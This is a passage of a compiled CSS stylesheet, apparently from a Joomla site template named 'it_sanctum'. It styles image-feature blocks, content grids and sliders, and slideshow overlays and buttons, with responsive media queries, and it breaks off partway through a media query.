/* line 105, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-bottom-info {
  margin-top: 15px;
}
/* line 108, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-feature-special {
  color: #c8c8c8;
  font-style: italic;
  float: left;
}
@media only all and (max-width: 30rem) {
  .g-image-features .g-image-feature-special {
    float: none;
  }
}
/* line 115, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-feature-special i {
  margin-right: 5px;
}
/* line 119, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-link {
  font-style: italic;
  float: right;
}
@media only all and (max-width: 30rem) {
  .g-image-features .g-image-features-link {
    float: none;
    margin-top: 5px;
  }
}
/* line 126, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .g-image-features-link i {
  margin-left: 10px;
}
/* line 130, templates/it_sanctum/scss/sanctum/_image-features.scss */
/* line 131, templates/it_sanctum/scss/sanctum/_image-features.scss */
.g-image-features .no-special .g-image-features-link {
  float: none;
}
/* line 4, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 5, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro:not(.gutter-disabled) {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
/* line 8, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro:not(.gutter-disabled) > .g-grid {
  margin-bottom: 1.876rem;
}
/* line 10, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro:not(.gutter-disabled) > .g-grid:last-child {
  margin-bottom: 0;
}
/* line 12, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 13, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 14, templates/it_sanctum/scss/sanctum/_content-pro.scss */
@media only all and (max-width: 47.938rem) {
  .g-content-pro:not(.gutter-disabled) > .g-grid:last-child > .g-block:last-child .g-content-pro-item {
    margin-bottom: 0 !important;
  }
}
@media only all and (max-width: 47.938rem) {
  .g-content-pro:not(.gutter-disabled) > .g-grid {
    margin-bottom: 0;
  }
}
/* line 26, templates/it_sanctum/scss/sanctum/_content-pro.scss */
@media only all and (max-width: 47.938rem) {
  .g-content-pro:not(.gutter-disabled) .g-content-pro-item {
    margin-bottom: 1.876rem !important;
  }
}
/* line 32, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .size-33 {
  -webkit-box-flex: 0;
  -moz-box-flex: 0;
  box-flex: 0;
  -webkit-flex: 0 33.3333%;
  -moz-flex: 0 33.3333%;
  -ms-flex: 0 33.3333%;
  flex: 0 33.3333%;
  width: 33.3333%;
}
@media only all and (max-width: 47.938rem) {
  .g-content-pro .size-33 {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    width: 100%;
  }
}
/* line 41, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .size-16 {
  -webkit-box-flex: 0;
  -moz-box-flex: 0;
  box-flex: 0;
  -webkit-flex: 0 16.6666%;
  -moz-flex: 0 16.6666%;
  -ms-flex: 0 16.6666%;
  flex: 0 16.6666%;
  width: 16.6666%;
}
@media only all and (max-width: 47.938rem) {
  .g-content-pro .size-16 {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    width: 100%;
  }
}
/* line 51, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro, .g-content-pro-slider, .g-content-pro-slideset {
  text-align: center;
}
/* line 53, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro.g-pullup, .g-content-pro-slider.g-pullup, .g-content-pro-slideset.g-pullup {
  margin-top: -9.2505rem;
  position: relative;
  z-index: 21;
}
/* line 57, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro.g-pullup .g-content-pro-item, .g-content-pro-slider.g-pullup .g-content-pro-item, .g-content-pro-slideset.g-pullup .g-content-pro-item {
  border: none;
}
/* line 61, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 62, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro.gutter-disabled .g-content-pro-item, .g-content-pro-slider.gutter-disabled .g-content-pro-item, .g-content-pro-slideset.gutter-disabled .g-content-pro-item {
  border: none;
}
/* line 65, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro.gutter-disabled .uk-slideset, .g-content-pro-slider.gutter-disabled .uk-slideset, .g-content-pro-slideset.gutter-disabled .uk-slideset {
  margin-left: 0;
}
/* line 67, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 68, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro.gutter-disabled .uk-slideset.uk-grid > *, .g-content-pro-slider.gutter-disabled .uk-slideset.uk-grid > *, .g-content-pro-slideset.gutter-disabled .uk-slideset.uk-grid > * {
  padding-left: 0;
}
/* line 74, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-content, .g-content-pro-slider .g-content, .g-content-pro-slideset .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
/* line 79, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-content-pro-item, .g-content-pro-slider .g-content-pro-item, .g-content-pro-slideset .g-content-pro-item {
  border: 1px solid #ddd;
}
@media only all and (max-width: 47.938rem) {
  .g-content-pro .g-content-pro-item, .g-content-pro-slider .g-content-pro-item, .g-content-pro-slideset .g-content-pro-item {
    margin-bottom: 3.126rem;
  }
  /* line 83, templates/it_sanctum/scss/sanctum/_content-pro.scss */
  .g-content-pro .g-content-pro-item:last-child, .g-content-pro-slider .g-content-pro-item:last-child, .g-content-pro-slideset .g-content-pro-item:last-child {
    margin-bottom: 0;
  }
}
/* line 88, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 89, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-content-pro-image > a, .g-content-pro-slider .g-content-pro-image > a, .g-content-pro-slideset .g-content-pro-image > a {
  display: block;
}
/* line 92, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-content-pro-image img, .g-content-pro-slider .g-content-pro-image img, .g-content-pro-slideset .g-content-pro-image img {
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}
/* line 96, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-info-container, .g-content-pro-slider .g-info-container, .g-content-pro-slideset .g-info-container {
  padding: 20px;
  background: #fff;
}
/* line 100, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro p, .g-content-pro-slider p, .g-content-pro-slideset p {
  margin: 0;
}
/* line 103, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-content-pro-title, .g-content-pro-slider .g-content-pro-title, .g-content-pro-slideset .g-content-pro-title {
  margin: 0;
}
/* line 105, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-content-pro-title a, .g-content-pro-slider .g-content-pro-title a, .g-content-pro-slideset .g-content-pro-title a {
  color: #282828;
}
/* line 107, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-content-pro-title a:hover, .g-content-pro-slider .g-content-pro-title a:hover, .g-content-pro-slideset .g-content-pro-title a:hover {
  color: #4f953b;
}
/* line 112, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-content-pro-desc, .g-content-pro-slider .g-content-pro-desc, .g-content-pro-slideset .g-content-pro-desc {
  margin-top: 0.4rem;
}
/* line 115, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 116, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-info-container-style2.uk-overlay-panel, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel {
  padding: 15px;
}
/* line 118, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-info-container-style2.uk-overlay-panel p, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel p, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel p {
  margin-top: 5px;
}
/* line 121, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-info-container-style2.uk-overlay-panel a, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel a, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel a {
  color: #fff;
}
/* line 123, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-info-container-style2.uk-overlay-panel a:hover, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel a:hover, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel a:hover {
  color: #4f953b;
}
/* line 128, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-info-container-style2 .g-content-pro-special, .g-content-pro-slider .g-info-container-style2 .g-content-pro-special, .g-content-pro-slideset .g-info-container-style2 .g-content-pro-special, .g-content-pro .g-info-container-style2 .g-item-details, .g-content-pro-slider .g-info-container-style2 .g-item-details, .g-content-pro-slideset .g-info-container-style2 .g-item-details {
  color: #eee;
}
/* line 132, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-content-pro-special, .g-content-pro-slider .g-content-pro-special, .g-content-pro-slideset .g-content-pro-special {
  color: #c8c8c8;
  font-style: italic;
  float: left;
}
@media only all and (max-width: 30rem) {
  .g-content-pro .g-content-pro-special, .g-content-pro-slider .g-content-pro-special, .g-content-pro-slideset .g-content-pro-special {
    float: none;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-content-pro .g-content-pro-special, .g-content-pro-slider .g-content-pro-special, .g-content-pro-slideset .g-content-pro-special {
    float: none;
  }
}
/* line 142, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-content-pro-special i, .g-content-pro-slider .g-content-pro-special i, .g-content-pro-slideset .g-content-pro-special i {
  margin-right: 5px;
}
/* line 146, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-content-pro-link, .g-content-pro-slider .g-content-pro-link, .g-content-pro-slideset .g-content-pro-link {
  float: right;
  font-style: italic;
}
/* line 149, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-content-pro-link i, .g-content-pro-slider .g-content-pro-link i, .g-content-pro-slideset .g-content-pro-link i {
  margin-left: 10px;
}
@media only all and (max-width: 30rem) {
  .g-content-pro .g-content-pro-link, .g-content-pro-slider .g-content-pro-link, .g-content-pro-slideset .g-content-pro-link {
    float: none;
    margin-top: 5px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-content-pro .g-content-pro-link, .g-content-pro-slider .g-content-pro-link, .g-content-pro-slideset .g-content-pro-link {
    float: none;
    margin-top: 5px;
  }
}
/* line 161, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 162, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .no-special .g-content-pro-link, .g-content-pro-slider .no-special .g-content-pro-link, .g-content-pro-slideset .no-special .g-content-pro-link {
  float: none;
}
/* line 166, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 167, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .no-link .g-content-pro-special, .g-content-pro-slider .no-link .g-content-pro-special, .g-content-pro-slideset .no-link .g-content-pro-special {
  float: none;
}
/* line 171, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-bottom-info, .g-content-pro-slider .g-bottom-info, .g-content-pro-slideset .g-bottom-info {
  margin-top: 15px;
}
/* line 174, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-item-details, .g-content-pro-slider .g-item-details, .g-content-pro-slideset .g-item-details {
  margin-top: 0.4rem;
  font-size: 90%;
  color: #c8c8c8;
}
/* line 178, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 179, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro .g-item-details .date i, .g-content-pro-slider .g-item-details .date i, .g-content-pro-slideset .g-item-details .date i {
  margin-right: 5px;
}
/* line 184, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 185, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro.style3 .g-info-container-style2, .g-content-pro-slider.style3 .g-info-container-style2, .g-content-pro-slideset.style3 .g-info-container-style2 {
  background: -webkit-linear-gradient( top , rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%);
  background: linear-gradient(to bottom, rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%);
  padding: 20px;
}
/* line 188, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro.style3 .g-info-container-style2 a, .g-content-pro-slider.style3 .g-info-container-style2 a, .g-content-pro-slideset.style3 .g-info-container-style2 a {
  color: #fff;
}
/* line 190, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro.style3 .g-info-container-style2 a:hover, .g-content-pro-slider.style3 .g-info-container-style2 a:hover, .g-content-pro-slideset.style3 .g-info-container-style2 a:hover {
  color: #fff;
  text-decoration: underline;
}
/* line 196, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 197, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 198, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro.style3 .g-content-pro-image .uk-overlay img, .g-content-pro-slider.style3 .g-content-pro-image .uk-overlay img, .g-content-pro-slideset.style3 .g-content-pro-image .uk-overlay img {
  -webkit-transition: all 1s;
  -moz-transition: all 1s;
  transition: all 1s;
}
/* line 202, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 203, templates/it_sanctum/scss/sanctum/_content-pro.scss */
/* line 204, templates/it_sanctum/scss/sanctum/_content-pro.scss */
.g-content-pro.style3 .g-content-pro-image:hover .uk-overlay img, .g-content-pro-slider.style3 .g-content-pro-image:hover .uk-overlay img, .g-content-pro-slideset.style3 .g-content-pro-image:hover .uk-overlay img {
  -webkit-transform: scale(1.15);
  -moz-transform: scale(1.15);
  -ms-transform: scale(1.15);
  -o-transform: scale(1.15);
  transform: scale(1.15);
}
/* line 4, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
/* line 5, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro:not(.gutter-disabled) {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
/* line 8, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro:not(.gutter-disabled) > .g-grid {
  margin-bottom: 1.876rem;
}
/* line 10, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro:not(.gutter-disabled) > .g-grid:last-child {
  margin-bottom: 0;
}
/* line 12, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
/* line 13, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
/* line 14, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
@media only all and (max-width: 47.938rem) {
  .g-content-pro:not(.gutter-disabled) > .g-grid:last-child > .g-block:last-child .g-content-pro-item {
    margin-bottom: 0 !important;
  }
}
@media only all and (max-width: 47.938rem) {
  .g-content-pro:not(.gutter-disabled) > .g-grid {
    margin-bottom: 0;
  }
}
/* line 26, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
@media only all and (max-width: 47.938rem) {
  .g-content-pro:not(.gutter-disabled) .g-content-pro-item {
    margin-bottom: 1.876rem !important;
  }
}
/* line 34, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro, .g-content-pro-slider, .g-content-pro-slideset {
  text-align: center;
}
/* line 36, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro.g-pullup, .g-content-pro-slider.g-pullup, .g-content-pro-slideset.g-pullup {
  margin-top: -9.2505rem;
  position: relative;
  z-index: 21;
}
/* line 40, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro.g-pullup .g-content-pro-item, .g-content-pro-slider.g-pullup .g-content-pro-item, .g-content-pro-slideset.g-pullup .g-content-pro-item {
  border: none;
}
/* line 44, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
/* line 45, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro.gutter-disabled .g-content-pro-item, .g-content-pro-slider.gutter-disabled .g-content-pro-item, .g-content-pro-slideset.gutter-disabled .g-content-pro-item {
  border: none;
}
/* line 48, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro.gutter-disabled .uk-slideset, .g-content-pro-slider.gutter-disabled .uk-slideset, .g-content-pro-slideset.gutter-disabled .uk-slideset {
  margin-left: 0;
}
/* line 50, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
/* line 51, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro.gutter-disabled .uk-slideset.uk-grid > *, .g-content-pro-slider.gutter-disabled .uk-slideset.uk-grid > *, .g-content-pro-slideset.gutter-disabled .uk-slideset.uk-grid > * {
  padding-left: 0;
}
/* line 57, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-content, .g-content-pro-slider .g-content, .g-content-pro-slideset .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
/* line 62, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-content-pro-item, .g-content-pro-slider .g-content-pro-item, .g-content-pro-slideset .g-content-pro-item {
  border: 1px solid #ddd;
  width: 100%;
}
@media only all and (max-width: 47.938rem) {
  .g-content-pro .g-content-pro-item, .g-content-pro-slider .g-content-pro-item, .g-content-pro-slideset .g-content-pro-item {
    margin-bottom: 3.126rem;
  }
  /* line 67, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
  .g-content-pro .g-content-pro-item:last-child, .g-content-pro-slider .g-content-pro-item:last-child, .g-content-pro-slideset .g-content-pro-item:last-child {
    margin-bottom: 0;
  }
}
/* line 72, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-content-pro-image, .g-content-pro-slider .g-content-pro-image, .g-content-pro-slideset .g-content-pro-image {
  width: 100%;
  background-position: center;
  background-size: cover;
}
/* line 76, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-content-pro-image > a, .g-content-pro-slider .g-content-pro-image > a, .g-content-pro-slideset .g-content-pro-image > a {
  display: block;
  width: 100%;
  height: 100%;
}
/* line 81, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-content-pro-image img, .g-content-pro-slider .g-content-pro-image img, .g-content-pro-slideset .g-content-pro-image img {
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}
/* line 85, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-info-container, .g-content-pro-slider .g-info-container, .g-content-pro-slideset .g-info-container {
  padding: 20px;
  background: #fff;
}
/* line 89, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro p, .g-content-pro-slider p, .g-content-pro-slideset p {
  margin: 0;
}
/* line 92, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-content-pro-title, .g-content-pro-slider .g-content-pro-title, .g-content-pro-slideset .g-content-pro-title {
  margin: 0;
}
/* line 94, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-content-pro-title a, .g-content-pro-slider .g-content-pro-title a, .g-content-pro-slideset .g-content-pro-title a {
  color: #282828;
}
/* line 96, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-content-pro-title a:hover, .g-content-pro-slider .g-content-pro-title a:hover, .g-content-pro-slideset .g-content-pro-title a:hover {
  color: #4f953b;
}
/* line 101, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-content-pro-desc, .g-content-pro-slider .g-content-pro-desc, .g-content-pro-slideset .g-content-pro-desc {
  margin-top: 10px;
}
/* line 104, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
/* line 105, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-info-container-style2.uk-overlay-panel, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel {
  padding: 15px;
}
/* line 107, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-info-container-style2.uk-overlay-panel p, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel p, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel p {
  margin-top: 5px;
}
/* line 110, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-info-container-style2.uk-overlay-panel a, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel a, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel a {
  color: #fff;
}
/* line 112, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-info-container-style2.uk-overlay-panel a:hover, .g-content-pro-slider .g-info-container-style2.uk-overlay-panel a:hover, .g-content-pro-slideset .g-info-container-style2.uk-overlay-panel a:hover {
  color: #4f953b;
}
/* line 117, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-info-container-style2 .g-article-details, .g-content-pro-slider .g-info-container-style2 .g-article-details, .g-content-pro-slideset .g-info-container-style2 .g-article-details {
  color: #eee;
}
/* line 121, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-article-details, .g-content-pro-slider .g-article-details, .g-content-pro-slideset .g-article-details {
  margin-top: 10px;
  font-size: 90%;
  color: #bbb;
}
/* line 125, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-article-details > span, .g-content-pro-slider .g-article-details > span, .g-content-pro-slideset .g-article-details > span {
  margin-right: 10px;
}
/* line 127, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-article-details > span:last-child, .g-content-pro-slider .g-article-details > span:last-child, .g-content-pro-slideset .g-article-details > span:last-child {
  margin-right: 0;
}
/* line 130, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-article-details > span i, .g-content-pro-slider .g-article-details > span i, .g-content-pro-slideset .g-article-details > span i {
  margin-right: 5px;
}
/* line 135, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro .g-article-read-more, .g-content-pro-slider .g-article-read-more, .g-content-pro-slideset .g-article-read-more {
  margin-top: 15px;
}
/* line 138, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
/* line 139, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro.style3 .g-info-container-style2, .g-content-pro-slider.style3 .g-info-container-style2, .g-content-pro-slideset.style3 .g-info-container-style2 {
  background: -webkit-linear-gradient( top , rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%);
  background: linear-gradient(to bottom, rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%);
  padding: 20px;
}
/* line 142, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro.style3 .g-info-container-style2 a, .g-content-pro-slider.style3 .g-info-container-style2 a, .g-content-pro-slideset.style3 .g-info-container-style2 a {
  color: #fff;
}
/* line 144, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro.style3 .g-info-container-style2 a:hover, .g-content-pro-slider.style3 .g-info-container-style2 a:hover, .g-content-pro-slideset.style3 .g-info-container-style2 a:hover {
  color: #fff;
  text-decoration: underline;
}
/* line 150, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
/* line 151, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
/* line 152, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro.style3 .g-content-pro-image .uk-overlay img, .g-content-pro-slider.style3 .g-content-pro-image .uk-overlay img, .g-content-pro-slideset.style3 .g-content-pro-image .uk-overlay img {
  -webkit-transition: all 1s;
  -moz-transition: all 1s;
  transition: all 1s;
}
/* line 156, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
/* line 157, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
/* line 158, templates/it_sanctum/scss/sanctum/_content-pro-joomla.scss */
.g-content-pro.style3 .g-content-pro-image:hover .uk-overlay img, .g-content-pro-slider.style3 .g-content-pro-image:hover .uk-overlay img, .g-content-pro-slideset.style3 .g-content-pro-image:hover .uk-overlay img {
  -webkit-transform: scale(1.15);
  -moz-transform: scale(1.15);
  -ms-transform: scale(1.15);
  -o-transform: scale(1.15);
  transform: scale(1.15);
}
/* line 1, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 2, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .uk-overlay-panel {
  padding: 25px;
}
@media only all and (max-width: 47.938rem) {
  .g-slideshow .uk-overlay-panel {
    padding: 15px;
  }
  /* line 6, templates/it_sanctum/scss/sanctum/_slideshow.scss */
  .g-slideshow .uk-overlay-panel.uk-overlay-left {
    top: auto;
    bottom: 0;
    right: 0;
    width: 100%;
  }
  /* line 12, templates/it_sanctum/scss/sanctum/_slideshow.scss */
  .g-slideshow .uk-overlay-panel.uk-overlay-right {
    top: auto;
    bottom: 0;
    left: 0;
    width: 100%;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-slideshow .uk-overlay-panel {
    padding: 15px;
  }
  /* line 21, templates/it_sanctum/scss/sanctum/_slideshow.scss */
  .g-slideshow .uk-overlay-panel.uk-overlay-left {
    top: auto;
    bottom: 0;
    right: 0;
    width: 100%;
  }
  /* line 27, templates/it_sanctum/scss/sanctum/_slideshow.scss */
  .g-slideshow .uk-overlay-panel.uk-overlay-right {
    top: auto;
    bottom: 0;
    left: 0;
    width: 100%;
  }
}
@media only all and (min-width: 60rem) and (max-width: 74.938rem) {
  .g-slideshow .uk-overlay-panel {
    padding: 15px;
  }
}
/* line 38, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-overlay-container {
  width: 75rem;
  margin-left: auto;
  margin-right: auto;
  padding-left: 25px !important;
  padding-right: 25px !important;
}
@media only all and (min-width: 60rem) and (max-width: 74.938rem) {
  .g-slideshow .g-overlay-container {
    width: 60rem;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-slideshow .g-overlay-container {
    width: 48rem;
  }
}
@media only all and (min-width: 30.062rem) and (max-width: 47.938rem) {
  .g-slideshow .g-overlay-container {
    width: 30rem;
  }
}
@media only all and (max-width: 30rem) {
  .g-slideshow .g-overlay-container {
    width: 100%;
  }
}
/* line 57, templates/it_sanctum/scss/sanctum/_slideshow.scss */
/* line 58, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .nav-visible .uk-slidenav {
  opacity: 1;
}
/* line 62, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-slideshow-title {
  margin: 0 0 15px;
  color: #fff !important;
}
@media only all and (max-width: 47.938rem) {
  .g-slideshow .g-slideshow-title {
    margin: 0;
    font-size: 1rem;
  }
}
/* line 70, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-slideshow-desc {
  margin: 0;
}
@media only all and (max-width: 47.938rem) {
  .g-slideshow .g-slideshow-desc {
    display: none;
  }
}
/* line 75, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-slideshow-desc a:not(.button) {
  color: #4f953b;
}
/* line 77, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-slideshow-desc a:not(.button):hover {
  text-decoration: underline;
}
/* line 82, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-slideshow-buttons {
  margin: 25px 0 0;
}
@media only all and (max-width: 47.938rem) {
  .g-slideshow .g-slideshow-buttons {
    margin: 15px 0 0;
  }
}
/* line 87, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-slideshow-buttons .button {
  margin-right: 15px;
  border: 2px solid #4f953b;
  -webkit-transition: all 0.3s;
  -moz-transition: all 0.3s;
  transition: all 0.3s;
}
/* line 91, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-slideshow-buttons .button:hover {
  background: #5eb247;
  border-color: #5eb247;
}
/* line 96, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-slideshow-buttons .button:last-child {
  margin-right: 0;
}
/* line 99, templates/it_sanctum/scss/sanctum/_slideshow.scss */
.g-slideshow .g-slideshow-buttons .button > span {
  margin-right: 10px;
}
@media only all and (max-width: 47.938rem) {
  .g-slideshow .g-slideshow-buttons .button {
    display: block;
    margin-right: 0;
    margin-bottom: 15px;
  }
  /* line 106, templates/it_sanctum/scss/sanctum/_slideshow.scss */
  .g-slideshow .g-slideshow-buttons .button:last-child {
    margin-bottom: 0;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-slideshow .g-slideshow-buttons .button {
    display: block;
    margin-right: 0;
    margin-bottom: 15px;
  }
  /* line 114, templates/it_sanctum/scss/sanctum/_slideshow.scss */
